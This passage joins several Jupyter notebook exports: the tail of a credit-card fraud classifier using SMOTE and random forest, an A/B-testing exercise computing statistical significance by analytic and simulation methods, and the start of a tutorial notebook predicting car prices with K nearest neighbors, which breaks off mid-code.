smote_pipeline = make_pipeline_imb(SMOTE(random_state=4), \ classifier(random_state=42)) smote_model = smote_pipeline.fit(X_train, y_train) smote_prediction = smote_model.predict(X_test) #Showing the diference before and after the transformation used print("normal data distribution: {}".format(Counter(y))) X_smote, y_smote = SMOTE().fit_sample(X, y) print("SMOTE data distribution: {}".format(Counter(y_smote))) ###Output normal data distribution: Counter({0: 284315, 1: 492}) SMOTE data distribution: Counter({0: 284315, 1: 284315}) ###Markdown Evaluating the model SMOTE + Random Forest ###Code print("Confusion Matrix: ") print(confusion_matrix(y_test, smote_prediction)) conf_matrix=confusion_matrix(y_test, smote_prediction) print('\nSMOTE Pipeline Score {}'.format(smote_pipeline.score(X_test, y_test))) print_results("\nSMOTE + RandomForest classification", y_test, smote_prediction) plt.figure(figsize=(10, 10)) sns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt="d"); plt.title("Confusion matrix") plt.ylabel('True class') plt.xlabel('Predicted class') plt.tight_layout() # Compute predicted probabilities: y_pred_prob y_pred_prob = smote_pipeline.predict_proba(X_test)[:,1] # Generate precision recall curve values: precision, recall, thresholds precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob) # Plot ROC curve plt.plot(precision, recall) plt.xlabel('Recall') plt.ylabel('Precision') plt.title('Precision Recall Curve') plt.show() ###Output _____no_output_____ ###Markdown CONSIDERING ONLY RANDOM FOREST FOR COMPARING THE MODEL ###Code # Running the fit from sklearn.ensemble import RandomForestClassifier rf = RandomForestClassifier(max_depth=5, max_features = 7, n_estimators = 10) rf.fit(X_train, y_train) # Printing the Training Score print("Training score data: ") print(rf.score(X_train, y_train)) #Testing the model #Predicting by X_test y_pred = rf.predict(X_test) print(confusion_matrix(y_test, y_pred)) print_results("RF classification", y_test, y_pred) ###Output [[56871 7] [ 16 68]] RF classification accuracy: 0.9995962220427653 precision: 0.9066666666666666 recall: 0.8095238095238095 f2: 0.8272506082725061 ###Markdown Feature importance plot ###Code features = ["Time_min", 'Time_hours',"V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount"] plt.figure(figsize = (9,5)) feat_import = pd.DataFrame({'Feature': features, 'Feature importance': rf.feature_importances_}) feat_import = feat_import.sort_values(by='Feature importance',ascending=False) g = sns.barplot(x='Feature',y='Feature importance',data=feat_import) g.set_xticklabels(g.get_xticklabels(),rotation=90) g.set_title('Features importance - Random Forest',fontsize=20) plt.show() ###Output _____no_output_____ ###Markdown The top 4 feature are V17, V14, V12, V10 corresponds to 75% of total. Also the f2 score that is the median of recall and precision are on a considerably value ###Code #Predicting proba y_pred_prob = rf.predict_proba(X_test)[:,1] # Generate precision recall curve values: precision, recall, thresholds precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob) # Plot ROC curve plt.plot(precision, recall) plt.xlabel('Recall') plt.ylabel('Precision') plt.title('Precision Recall Curve') plt.show() ###Output _____no_output_____
ABTesting/L2_Statistical_Significance_Solution.ipynb
###Markdown Practice: Statistical SignificanceLet's say that we've collected data for a web-based experiment. In the experiment, we're testing the change in layout of a product information page to see if this affects the proportion of people who click on a button to go to the download page. This experiment has been designed to have a cookie-based diversion, and we record two things from each user: which page version they received, and whether or not they accessed the download page during the data recording period. (We aren't keeping track of any other factors in this example, such as number of pageviews, or time between accessing the page and making the download, that might be of further interest.)Your objective in this notebook is to perform a statistical test on both recorded metrics to see if there is a statistical difference between the two groups. ###Code # import packages import numpy as np import pandas as pd import scipy.stats as stats from statsmodels.stats import proportion as proptests import matplotlib.pyplot as plt % matplotlib inline # import data data = pd.read_csv('data/statistical_significance_data.csv') data.head(10) ###Output _____no_output_____ ###Markdown In the dataset, the 'condition' column takes a 0 for the control group, and 1 for the experimental group. The 'click' column takes a values of 0 for no click, and 1 for a click. Checking the Invariant MetricFirst of all, we should check that the number of visitors assigned to each group is similar. It's important to check the invariant metrics as a prerequisite so that our inferences on the evaluation metrics are founded on solid ground. If we find that the two groups are imbalanced on the invariant metric, then this will require us to look carefully at how the visitors were split so that any sources of bias are accounted for. It's possible that a statistically significant difference in an invariant metric will require us to revise random assignment procedures and re-do data collection.In this case, we want to do a two-sided hypothesis test on the proportion of visitors assigned to one of our conditions. Choosing the control or the experimental condition doesn't matter: you'll get the same result either way. Feel free to use whatever method you'd like: we'll highlight two main avenues below.If you want to take a simulation-based approach, you can simulate the number of visitors that would be assigned to each group for the number of total observations, assuming that we have an expected 50/50 split. Do this many times (200 000 repetitions should provide a good speed-variability balance in this case) and then see in how many simulated cases we get as extreme or more extreme a deviation from 50/50 that we actually observed. Don't forget that, since we have a two-sided test, an extreme case also includes values on the opposite side of 50/50. (e.g. Since simulated outcomes of .48 and lower are considered as being more extreme than an actual observation of 0.48, so too will simulated outcomes of .52 and higher.) The proportion of flagged simulation outcomes gives us a p-value on which to assess our observed proportion. We hope to see a larger p-value, insufficient evidence to reject the null hypothesis.If you want to take an analytic approach, you could use the exact binomial distribution to compute a p-value for the test. The more usual approach, however, is to use the normal distribution approximation. Recall that this is possible thanks to our large sample size and the central limit theorem. To get a precise p-value, you should also perform a continuity correction, either adding or subtracting 0.5 to the total count before computing the area underneath the curve. (e.g. If we had 415 / 850 assigned to the control group, then the normal approximation would take the area to the left of $(415 + 0.5) / 850 = 0.489$ and to the right of $(435 - 0.5) / 850 = 0.511$.)You can check your results by completing the quiz and watching the video following the workspace. You could also try using multiple approaches and seeing if they come up with similar outcomes! Analytic Approach ###Code # get number of trials and number of 'successes' n_obs = data.shape[0] n_control = data.groupby('condition').size()[0] n_control # Compute a z-score and p-value p = 0.5 sd = np.sqrt(p * (1-p) * n_obs) z = ((n_control + 0.5) - p * n_obs) / sd print(z) print(2 * stats.norm.cdf(z)) ###Output -0.506217597735 0.612703902554 ###Markdown Simulation Approach ###Code # get number of trials and number of 'successes' n_obs = data.shape[0] n_control = data.groupby('condition').size()[0] n_control # # simulate outcomes under null, compare to observed outcome p = 0.5 n_trials = 200_000 samples = np.random.binomial(n_obs, p, n_trials) print(np.logical_or(samples <= n_control, samples >= (n_obs - n_control)).mean()) ###Output 0.611725 ###Markdown Checking the Evaluation MetricAfter performing our checks on the invariant metric, we can move on to performing a hypothesis test on the evaluation metric: the click-through rate. In this case, we want to see that the experimental group has a significantly larger click-through rate than the control group, a one-tailed test.The simulation approach for this metric isn't too different from the approach for the invariant metric. You'll need the overall click-through rate as the common proportion to draw simulated values from for each group. You may also want to perform more simulations since there's higher variance for this test.There's a few analytic approaches possible here, but you'll probably make use of the normal approximation again in these cases. In addition to the pooled click-through rate, you'll need a pooled standard deviation in order to compute a z-score. While there is a continuity correction possible in this case as well, it's much more conservative than the p-value that a simulation will usually imply. Computing the z-score and resulting p-value without a continuity correction should be closer to the simulation's outcomes, though slightly more optimistic about there being a statistical difference between groups.As with the previous question, you'll find a quiz and video following the workspace for you to check your results. ###Code p_click = data.groupby('condition').mean()['click'] p_click p_click[1] - p_click[0] ###Output _____no_output_____ ###Markdown Analytic Approach ###Code # get number of trials and overall 'success' rate under null n_control = data.groupby('condition').size()[0] n_exper = data.groupby('condition').size()[1] p_null = data['click'].mean() # compute standard error, z-score, and p-value se_p = np.sqrt(p_null * (1-p_null) * (1/n_control + 1/n_exper)) z = (p_click[1] - p_click[0]) / se_p print(z) print(1-stats.norm.cdf(z)) ###Output 1.75718873962 0.0394428219746 ###Markdown Simulation Approach ###Code # get number of trials and overall 'success' rate under null n_control = data.groupby('condition').size()[0] n_exper = data.groupby('condition').size()[1] p_null = data['click'].mean() # simulate outcomes under null, compare to observed outcome n_trials = 200_000 ctrl_clicks = np.random.binomial(n_control, p_null, n_trials) exp_clicks = np.random.binomial(n_exper, p_null, n_trials) samples = exp_clicks / n_exper - ctrl_clicks / n_control print((samples >= (p_click[1] - p_click[0])).mean()) ###Output 0.039785
_notebooks/2021-12-21-Predicting-Car-Prices-K-Nearest-Neighbors.ipynb
###Markdown "Predicting Car Prices using the K Nearest Neighbors Algorithm"> "I use various machine learning workflow techniques to arrive at the optimal K Nearest Neighbors (KNN) regression model for predicting car prices."- author: Migs Germar- toc: true- branch: master- badges: true- comments: true- categories: [python, pandas, numpy, matplotlib, seaborn, scipy, sklearn]- hide: false- search_exclude: false- image: images/notebook-images/knn-car-prices/two-cars.jfif Wheelscene | Chris Smith IntroductionK Nearest Neighbors or KNN is an an algorithm that can make predictions based on the similarity between different observations. In this project, I used KNN to predict the price of a car based on how similar its features are to those of other cars. Towards this end, I applied various machine learning techniques, such as standardization, feature selection, train-test split, hyperparameter optimization, and k-fold cross validation. > Note: I wrote this notebook by following a guided project on the [Dataquest](https://www.dataquest.io/) platform, specifically the [Guided Project: Predicting Car Prices](https://app.dataquest.io/c/36/m/155/guided-project%3A-predicting-car-prices/1/introduction-to-the-data-set). The general project flow and research questions were guided by Dataquest. Furthermore, though the mathematical explanations in this post were written in my own words, I learned the theory from Dataquest. Below are the packages used in this project. ###Code import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import re from scipy.stats import zscore from sklearn.neighbors import KNeighborsRegressor from sklearn.model_selection import KFold, cross_val_score, train_test_split from sklearn.feature_selection import f_regression, SelectKBest from sklearn.metrics import mean_squared_error ###Output _____no_output_____ ###Markdown Data Inspection and CleaningThe dataset for this project is the Automobile Data Set by Schlimmer (1987), from the UCI Machine Learning Repository. The data and its description can be obtained [here](https://archive.ics.uci.edu/ml/datasets/automobile).The dataset describes 26 features of hundreds of cars. A summary of the features and their data types is shown below. ###Code #collapse-hide # Data dictionary from documentation. data_dict = """1. symboling: -3, -2, -1, 0, 1, 2, 3. 2. normalized-losses: continuous from 65 to 256. 3. make: alfa-romero, audi, bmw, chevrolet, dodge, honda, isuzu, jaguar, mazda, mercedes-benz, mercury, mitsubishi, nissan, peugot, plymouth, porsche, renault, saab, subaru, toyota, volkswagen, volvo 4. fuel-type: diesel, gas. 5. aspiration: std, turbo. 6. num-of-doors: four, two. 7. body-style: hardtop, wagon, sedan, hatchback, convertible. 8. drive-wheels: 4wd, fwd, rwd. 9. engine-location: front, rear. 10. wheel-base: continuous from 86.6 120.9. 11. length: continuous from 141.1 to 208.1. 12. width: continuous from 60.3 to 72.3. 13. height: continuous from 47.8 to 59.8. 14. curb-weight: continuous from 1488 to 4066. 15. engine-type: dohc, dohcv, l, ohc, ohcf, ohcv, rotor. 16. num-of-cylinders: eight, five, four, six, three, twelve, two. 17. engine-size: continuous from 61 to 326. 18. fuel-system: 1bbl, 2bbl, 4bbl, idi, mfi, mpfi, spdi, spfi. 19. bore: continuous from 2.54 to 3.94. 20. stroke: continuous from 2.07 to 4.17. 21. compression-ratio: continuous from 7 to 23. 22. horsepower: continuous from 48 to 288. 23. peak-rpm: continuous from 4150 to 6600. 24. city-mpg: continuous from 13 to 49. 25. highway-mpg: continuous from 16 to 54. 26. price: continuous from 5118 to 45400.""" # Use regex to extract column names from data dictionary. col_names = re.findall( pattern = r"^[0-9]{1,2}\. ([a-z\-]+):", string = data_dict, # Use multiline flag so that ^ indicates the start of a line. flags = re.MULTILINE, ) # Read data file and add column names. cars_df = pd.read_csv( "./private/Car-Prices-KNN-Files/imports-85.data", names = col_names, ) cars_df.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 205 entries, 0 to 204 Data columns (total 26 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 symboling 205 non-null int64 1 normalized-losses 205 non-null object 2 make 205 non-null object 3 fuel-type 205 non-null object 4 aspiration 205 non-null object 5 num-of-doors 205 non-null object 6 body-style 205 non-null object 7 drive-wheels 205 non-null object 8 engine-location 205 non-null object 9 wheel-base 205 non-null float64 10 length 205 non-null float64 11 width 205 non-null float64 12 height 205 non-null float64 13 curb-weight 205 non-null int64 14 engine-type 205 non-null object 15 num-of-cylinders 205 non-null object 16 engine-size 205 non-null int64 17 fuel-system 205 non-null object 18 bore 205 non-null object 19 stroke 205 non-null object 20 compression-ratio 205 non-null float64 21 horsepower 205 non-null object 22 peak-rpm 205 non-null object 23 city-mpg 205 non-null int64 24 highway-mpg 205 non-null int64 25 price 205 non-null object dtypes: float64(5), int64(5), object(16) memory usage: 41.8+ KB ###Markdown There are 205 cars and 26 features. Most of the features directly describe physical characteristics of the cars. Some exceptions are "symboling" and "normalized-losses", which are values related to car insurance and are beyond the scope of this project. Also, the "price" column provides the price of each car in USD.Let us look at the first five rows. ###Code #collapse-hide cars_df.head() ###Output _____no_output_____ ###Markdown If we compare the data type of each column to its contents, several opportunities for data cleaning can be seen. For example, the "normalized-losses" feature is listed as an object-type column because it contains both strings and numbers. However, the strings in the column are question marks (?). Rather than being categories, these may be placeholders for missing data. This problem applies to several other columns, not just this one.Furthermore, in some columns like "num-of-doors", numbers are written as words. For example, 2 is written as "two". Since the numbers are in string format, these cannot be used in the K Nearest Neighbors model.Thus, in summary, the following cleaning steps have to be performed:- Replace question mark strings ("?") with null values (NaN). These are the proper way to indicate missing values.- Convert several object columns, like "normalized-losses", into numeric columns.- Replace numbers written as words with their proper numeric equivalents. For example, replace "four" with 4.These were performed in the following code cell. ###Code #collapse-hide # Clean the data. # Replace ? with NaN since these are placeholders. cars_df = cars_df.replace("?", np.nan) # Change this object column to float type. obj_to_numeric = [ "normalized-losses", "bore", "stroke", "horsepower", "peak-rpm", "price", ] for col in obj_to_numeric: cars_df[col] = pd.to_numeric(cars_df[col], errors = "coerce") # Replace strings with numeric equivalents. cars_df["num-of-doors"] = cars_df["num-of-doors"].replace( { "four": 4.0, "two": 2.0, } ) cars_df["num-of-cylinders"] = cars_df["num-of-cylinders"].replace( { "four": 4, "six": 6, "five": 5, "eight": 8, "two": 2, "three": 3, "twelve": 12, } ) cars_df.info() ###Output <class 'pandas.core.frame.DataFrame'> RangeIndex: 205 entries, 0 to 204 Data columns (total 26 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 symboling 205 non-null int64 1 normalized-losses 164 non-null float64 2 make 205 non-null object 3 fuel-type 205 non-null object 4 aspiration 205 non-null object 5 num-of-doors 203 non-null float64 6 body-style 205 non-null object 7 drive-wheels 205 non-null object 8 engine-location 205 non-null object 9 wheel-base 205 non-null float64 10 length 205 non-null float64 11 width 205 non-null float64 12 height 205 non-null float64 13 curb-weight 205 non-null int64 14 engine-type 205 non-null object 15 num-of-cylinders 205 non-null int64 16 engine-size 205 non-null int64 17 fuel-system 205 non-null object 18 bore 201 non-null float64 19 stroke 201 non-null float64 20 compression-ratio 205 non-null float64 21 horsepower 203 non-null float64 22 peak-rpm 203 non-null float64 23 city-mpg 205 non-null int64 24 highway-mpg 205 non-null int64 25 price 201 non-null float64 dtypes: float64(12), int64(6), object(8) memory usage: 41.8+ KB ###Markdown The new summary of columns is shown above. Several columns which were once "object" columns are now numeric. Also, since we replaced "?" placeholders with null values, we can now see that some columns have missing values. ###Code #collapse-hide null_percs = ( cars_df .isnull() .sum() .divide(cars_df.shape[0]) .multiply(100) ) null_percs.loc[null_percs > 0] ###Output _____no_output_____ ###Markdown The table above shows the percentage of missing values in each column that has them. In particular, "normalized-losses" has missing values in 20% of the observations. Thus, we will have to drop this column from the dataset. This is better than the alternative, which is to delete all rows where "normalized-losses" is missing.As for the other 6 columns, we will use listwise deletion. This means that we will drop all rows with missing values in any of those columns. ###Code #collapse-hide cars_df = ( cars_df .drop("normalized-losses", axis = 1) .dropna( subset = [ "num-of-doors", "bore", "stroke", "horsepower", "peak-rpm", "price", ] ) ) num_null = cars_df.isnull().sum().sum() print(f"Total number of missing values: {num_null}") print(f"New shape of dataset: {cars_df.shape}") ###Output Total number of missing values: 0 New shape of dataset: (193, 25) ###Markdown Now, there are no more missing values in the dataset. There are 193 rows and 25 columns left. The K Nearest Neighbors AlgorithmNext, I will discuss the theory behind the KNN algorithm, then implement it on the dataset.First, let us discuss basic terminology. For your reference, below is a small part of the dataset: ###Code #collapse-hide cars_df.loc[:5, ["make", "fuel-type", "num-of-doors", "body-style", "price"]] ###Output _____no_output_____ ###Markdown Each row of data is called an observation; in this case, each observation is a car.On the other hand, each column is either a feature or a target. The target is the variable that we try to predict, and the features are information used to make the prediction. In the case of this project, the features may include the size of the car, the number of doors, etc. The target is the price of the car.The set of cars whose prices we will predict is called the testing set. On the other hand, the training set is the set of cars used to train the model to make predictions. Put more simply, in order to predict the price of a car in the testing set, we must compare it to the cars in the training set.In order to compare cars, KNN uses the Euclidean distance as a similarity metric between two observations. A low distance close to 0 means that the observations are very similar to each other. The following formula is used:$d = \sqrt{\sum_{i=1}^n (q_i - p_i)^2}$- $d$ is the Euclidean distance.- $n$ is the number of features.- $q$ and $p$ each refer to a different observation in the data. In this case, each is a different car. - $q_i$ is the value of feature $i$ for observation $q$. For example, if feature $1$ is the number of doors, $q_1$ is the number of doors on car $q$.- The differences between the two observations' features are squared, then summed up. Finally, the square root of the sum gives the Euclidean distance.Given that we want to predict the price of a car $q$, KNN computes the Euclidean distance of $q$ from *every single car in the training set*. The cars most similar to $q$ are its "nearest neighbors."We then choose a number $k$, which will determine how many of the nearest neighbors will be selected. For example, if $k = 5$, we select the five most similar cars. Then, we take the mean price of these five cars, and we predict that this is the price of car $q$.Since we make a prediction based on an observation's $k$ nearest neighbors, the algorithm is called K Nearest Neighbors. Note that what I have described is an example of a KNN regression model, as it predicts a numeric target. There are still several other forms of KNN. Some use a different similarity metric like Manhattan distance, and some perform classification, which means that they predict a categorical target (Miller, 2019). Techniques for ImplementationUnlike with my previous [post](https://miguelahg.github.io/mahg-data-science/python/pandas/numpy/matplotlib/scikit-learn/2021/12/14/Naive-Bayes-Algorithm-Detecting-Spam-Messages.html) on the Naive Bayes Algorithm, I will not be programming this algorithm manually. Instead, I will use the scikit-learn workflow, which involves pre-packaged machine learning functions.In this part, I will individually discuss certain important techniques used in the machine learning workflow. In the next part, I will combine these techniques in order to obtain the optimal KNN model. StandardizationThe first important technique is standardization. So that each feature will contribute equally to the Euclidean distance, we will standardize each numeric feature. In other words, each value will be converted into a z-score so that the mean of each feature is 0 and its standard deviation is 1. The following equation is used:$z = \frac{x - \bar{x}}{s}$- $z$ is the z-score.- $x$ is a value in a feature.- $\bar{x}$ is the mean of the feature.- $s$ is the sample standard deviation. ###Code #collapse-hide all_feature_cols = [col for col in cars_df.columns if col != "price"] # Series of feature:data type fdt = cars_df[all_feature_cols].dtypes # Identify numeric features all_numeric_features = fdt.index[fdt != "object"] # Standardize cars_df[all_numeric_features] = cars_df[all_numeric_features].apply(zscore, axis = 0, ddof = 1) cars_df[all_numeric_features].head() ###Output _____no_output_____ ###Markdown The table above shows the first 5 rows of all of the numeric features. Notice that each feature now contains positive and negative values close to 0 because it was standardized. Feature SelectionThe second technique is feature selection. We must choose features which we think are most relevant to a car's price. We can only select numeric features since categorical ones cannot be used to calculate Euclidean distance. Thus, we must select from the following features: ###Code #collapse-hide all_numeric_features.to_list() ###Output _____no_output_____ ###Markdown All of these features are physical characteristics of a car, except for "symboling". According to the dataset documentation by Schlimmer (2019), this feature is an "insurance risk rating." It elaborates:> Cars are initially assigned a risk factor symbol associated with its price. Then, if it is more risky (or less), this symbol is adjusted by moving it up (or down) the scale. Actuarians call this process "symboling". A value of +3 indicates that the auto is risky, -3 that it is probably pretty safe. Given that this feature is systematically associated with the price of a car, it may be relevant to our model. Thus, we will consider it along with the other numeric features.In order to determine which combination of features is the best, we will use univariate feature selection. "Univariate" refers to the use of a single variable. We will perform a statistical test between each feature and the target. Then, we will select the features with the highest scores from the statistical test (scikit-learn developers, 2021).In our case, we have a regression problem, since we want to predict a continuous variable, car price. Thus, we will use the F-statistic as our score function. According to Frost (2017), the F-statistic indicates the "overall significance" of a linear regression model. In univariate feature selection, we would do the following steps:- For each feature: - Perform linear regression where the independent variable is the feature and the dependent variable is the target (in this case, price). - Obtain the F-statistic.- Compile a list with the F-statistic of each feature.- Identify the features with the highest F-statistics.This can be implemented automatically using the scikit-learn's `SelectKBest` class. It is called `SelectKBest` because we can set a parameter `k` which tells how many features to select. For example, if `k = 3`, the top three features with the highest F-statistic are selected. This is done below: ###Code #collapse-hide skb = SelectKBest( score_func = f_regression, k = 3, ) X = cars_df[all_numeric_features] y = cars_df["price"] X_new = skb.fit_transform(X, y) best_features = list(skb.get_feature_names_out()) print("Top 3 features:", best_features) ###Output Top 3 features: ['curb-weight', 'engine-size', 'horsepower'] ###Markdown The results show that curb weight, engine size, and horsepower are the highest-scoring features. However, we will not select these yet for the final model, since other steps still must be discussed. Train-Test Split with StratificationTrain-test split is the third important technique.Before model training, the dataset has to be split into training and testing sets. We will use 80% of the data in the training set and 20% in the testing set. As the names suggest, the training set is used to train the model or help it *learn* how to predict car prices. Then, we make predictions on the cars on the testing set to see whether the predictions are accurate.Before we split the data, though, we have to ensure that the frequency distribution of the target is similar between the training and testing sets. Below is a histogram of the frequency distribution of car price across the entire dataset: ###Code #collapse-hide sns.histplot(cars_df["price"], bins = 100) plt.title("Frequency Distribution of Car Price") plt.xlabel("Price (USD)") plt.ylabel("Number of Cars") plt.show() ###Output _____no_output_____ ###Markdown The graph shows a right-skewed distribution, which means that most of the car prices are low and there are outliers with high prices. When we split the data into training and testing sets, we want each set to have a similar distribution to this.De Cock (2011) provides a helpful suggestion on how to do this. The article says, "Simply order the original data set by a variable of interest (such as sale price) and select every kth observation to achieve the desired sample size (k=2 for a 50/50 split or k=4 for a 75/25 split)."In our case, we want an 80/20 split. One-fifth of the data will go to the testing set, so we can use k = 5. We will thus order the observations by price, then assign every 5th observation to the testing set. All other observations will go to the training set.In the code below, I have written a custom function `stratify_continuous` that uses this technique. I then performed a train-test split after stratification. `X_train` and `y_train` refer to the features and target in the training set, respectively. `X_test` and `y_test` are from the testing set. ###Code #collapse-hide def stratify_continuous(n_folds, y): """Stratify a dataset on a continuous target.""" if n_folds < 2 or n_folds > 10: raise ValueError("Please select a number of folds from 2 to 10.") fold_nums = list(range(n_folds)) # DataFrame where "index" column contains the original indices df = pd.DataFrame( y # Shuffle before ranking so that cars with the same price are ordered randomly. .sample(frac = 1, random_state = 1, ignore_index = False) ) # This column gives a rank to each value in y. 0 is the rank of the lowest value. # Ties are broken according to order of appearance. df["rank"] = df[y.name].rank(method = "first") - 1 df["fold"] = 0 for f in fold_nums[1:]: # start at f, then increment by n_folds indices = list(range(f, df.shape[0], n_folds)) df.loc[df["rank"].isin(indices), "fold"] = f # Revert df to original order of indices df = df.reindex(index = y.index) # A series that indicates the fold number of each observation according to its original position in y fold_series = df["fold"].copy() return fold_series folds = stratify_continuous( n_folds = 5, y = cars_df["price"], ) def split_folds(X, y, fold_series, test_fold): """Take a dataset whose observations have been grouped into folds, then perform a train-test split.""" if fold_series.dtype != "int64": raise AttributeError("The fold list does not purely contain integers.") test_mask = (fold_series == test_fold) X_train = X.loc[~test_mask].copy() y_train = y.loc[~test_mask].copy() X_test = X.loc[test_mask].copy() y_test = y.loc[test_mask].copy() return X_train, X_test, y_train, y_test X_train, X_test, y_train, y_test = split_folds( X = cars_df[all_numeric_features], y = cars_df["price"], fold_series = folds, test_fold = 4, ) # Summary statistics for target columns. target_df = pd.concat( [y_train, y_test], axis = 1, join = "outer", ) target_df.columns = ["y_train price", "y_test price"] target_df.describe() ###Output _____no_output_____ ###Markdown This table shows summary statistics for the price columns of the two sets. The sets have similar means at around USD 13,200, and they also have similar medians at around USD 10,200.Let us compare the price distributions using KDE plots: ###Code #collapse-hide sns.kdeplot(y_train, label = "Training set") sns.kdeplot(y_test, label = "Testing set") plt.title("Comparison of Car Prices Between Sets") plt.xlabel("Price (USD)") plt.ylabel("Probability Density") plt.legend() plt.show() ###Output _____no_output_____ ###Markdown The KDE plots both seem to follow the same shape and have the same center. This shows that the training and testing sets have roughly the same distribution of car prices. Thus, these were stratified correctly. Hyperparameter OptimizationThe fourth technique is hyperparameter optimization. This involves training the KNN model using different hyperparameter values to see which one performs the best.A hyperparameter is a value that influences the behavior of a model and has no relation to the data. In the case of KNN, one important hyperparameter is the $k$ value, or the number of neighbors used to make a prediction. If $k = 5$, we take the mean price of the top five most similar cars and call this our prediction. However, if $k = 10$, we take the top ten cars, so the mean price may be different.We can optimize $k$ in this way:- Decide values of $k$ to test.- For each $k$ value, fit and evaluate a KNN model.- Identify the best-performing model and use its $k$ value in the final model.In order to evaluate a model, we need an evaluation metric. In our case, we will use the Root Mean Squared Error or RMSE. This is calculated with the following equation:$RMSE = \sqrt{\frac{1}{n} \sum_{i=1}^n (\text{actual}_i - \text{predicted}_i)^2}$- $n$ is the sample size.- $\text{actual}$ is the actual target value, or in this case, the actual price of a car.- $\text{predicted}$ is the predicted target value.RMSE can be interpreted as the average error of a regression model. For example, if $RMSE = 1000$, this means that the model's predicted car prices are USD 1000 away from the actual car prices, on average.Below is an example of hyperparameter optimization using RMSE. All of the numeric features were used for this example. ###Code #collapse-hide k_values = [1, 3, 5] k_rmse = pd.Series(dtype = "float64") for k in k_values: knn = KNeighborsRegressor( n_neighbors = k, algorithm = "auto", ) knn.fit(X_train, y_train) y_pred = knn.predict(X_test) rmse = np.sqrt(mean_squared_error(y_test, y_pred)) k_rmse.loc[k] = rmse print("k value and RMSE") k_rmse ###Output k value and RMSE ###Markdown The table above shows that RMSE was lowest for $k = 3$. The RMSE was about USD 3146, which means that on average, the predicted prices are USD 3146 away from the actual prices. K-Fold Cross-Validation The last technique that will be discussed is K-Fold Cross-Validation. Earlier, we split the data into one training set and one testing set. The K-Fold Cross-Validation allows us to obtain a more holistic view of model performance by rotating the observations used in the two sets. In the words of Brownlee (2018), it estimates "how the model is expected to perform in general when used to make predictions on data not used during the training of the model."Here, $k$ has a different meaning. It determines the number of splits to make in a dataset. For example, if $k = 5$, the dataset will be split into 5 folds, each set containing 20% of the total data.In summary, the following steps are performed:- Split the data into 5 folds: A, B, C, D, E.- Use fold A as the testing set and use the others as the training set.- Fit and evaluate a KNN model, thus obtaining RMSE.- Repeat the above process for a total of 5 times, so that each fold is used as a testing set once.- Compile a list of the five RMSE values obtained.- Compute the mean RMSE value. This is the final metric of model performance.K-Fold Cross-Validation can be implemented using scikit-learn's `KFold` and `cross_val_score` . An example of 5-fold cross-validation is shown below. ###Code #collapse-hide knn = KNeighborsRegressor( n_neighbors = 5, algorithm = "auto", ) kf = KFold(5, shuffle = True, random_state = 1) mses = cross_val_score( estimator = knn, X = cars_df[all_numeric_features], y = cars_df["price"], scoring = "neg_mean_squared_error", cv = kf, ) mses = pd.Series(mses) rmses = mses.abs().pow(1/2) mean_rmse = rmses.mean() sd_rmse = rmses.std(ddof = 1) print(f"""Regular 5-fold cross-validation Mean RMSE: {mean_rmse:.2f} Standard Deviation RMSE: {sd_rmse:.2f} RMSE Values: {rmses.to_list()}""") ###Output Regular 5-fold cross-validation Mean RMSE: 3722.28 Standard Deviation RMSE: 565.62 RMSE Values: [3407.8275635020186, 3902.1144860913682, 3009.7340988268425, 4521.314079941105, 3770.3892479494248] ###Markdown The mean RMSE above presents a better picture of the model's performance because it takes into account different possible combinations of training and testing sets.Note, however, that the standard deviation of the RMSE was around 566. This means that the RMSE values varied by several hundreds of dollars from model to model during the cross-validation. In simpler terms, the model performance was inconsistent. It performed much better when trained on some folds than when it was trained on other folds.Thus, we can take k-fold cross-validation a step further by stratifying the folds so that they will have similar price distributions. This will ensure that each fold is representative of the full sample. Thus, I have written a custom function in the code cell below to do this. ###Code #collapse-hide def stratified_kfcv(X, y, fold_series, regression_model): """Conduct k-fold cross-validation on a stratified dataset.""" fold_nums = fold_series.unique() mse_lst = [] for f in fold_nums: X_train, X_test, y_train, y_test = split_folds( X = X, y = y, test_fold = f, fold_series = fold_series, ) regression_model.fit(X_train, y_train) y_pred = regression_model.predict(X_test) mse = mean_squared_error(y_test, y_pred) mse_lst.append(mse) return mse_lst knn = KNeighborsRegressor( n_neighbors = 5, algorithm = "auto", ) mse_lst = stratified_kfcv( X = cars_df[all_numeric_features], y = cars_df["price"], fold_series = folds, regression_model = knn, ) mse_series = pd.Series(mse_lst) rmse_series = mse_series.pow(1/2) mean_rmse = rmse_series.mean() sd_rmse = rmse_series.std(ddof = 1) print(f"""Stratified 5-fold cross-validation Mean RMSE: {mean_rmse:.2f} Standard Deviation RMSE: {sd_rmse:.2f} RMSE Values: {rmse_series.to_list()}""") ###Output Stratified 5-fold cross-validation Mean RMSE: 3369.44 Standard Deviation RMSE: 387.33 RMSE Values: [3193.0727214096655, 2883.515369146238, 3844.6421242541865, 3674.5947449327227, 3251.39247707809] ###Markdown The mean RMSE from stratified CV was USD 3369. This is about USD 400 lower than the result of the regular CV, USD 3722.Furthermore, the SD RMSE is equal to 387, which is lower than the previous value of 566. Therefore, the five models trained during cross-validation performed more similarly to each other.Thus, we can see that stratifying observations before k-fold cross-validation can be more effective at approximating the true performance of the model compared to regular k-fold cross-validation. Combining TechniquesIn this part, we will combine all of the discussed techniques to optimize the KNN model.The steps are as follows:- Use the standardized features that were calculated earlier.- For each number `n_features` from 1 to 10: - Perform univariate feature selection using the F-statistic. - Identify the best `n_features` features. - For each number `k` from 1 to 20: - Evaluate the model using stratified 5-fold cross-validation. - For each fold, train a `k` nearest neighbors model using the best features. - Obtain the mean RMSE value.- Compile a list of all mean RMSE values obtained.- Identify the model with the lowest mean RMSE. This is the final model.This is implemented in the code below. ###Code #collapse-hide n_feature_list = list(range(1, 11)) result_lst = [] for n_features in n_feature_list: # Univariate feature selection skb = SelectKBest( score_func = f_regression, k = n_features, ) X = cars_df[all_numeric_features] y = cars_df["price"] X_new = skb.fit_transform(X, y) # List of "best" features best_features = list(skb.get_feature_names_out()) k_values = list(range(1, 21)) for k in k_values: # stratified 5-fold cross validation knn = KNeighborsRegressor( # Use a different k value each time n_neighbors = k, algorithm = "auto", ) mse_lst = stratified_kfcv( X = cars_df[best_features], y = cars_df["price"], 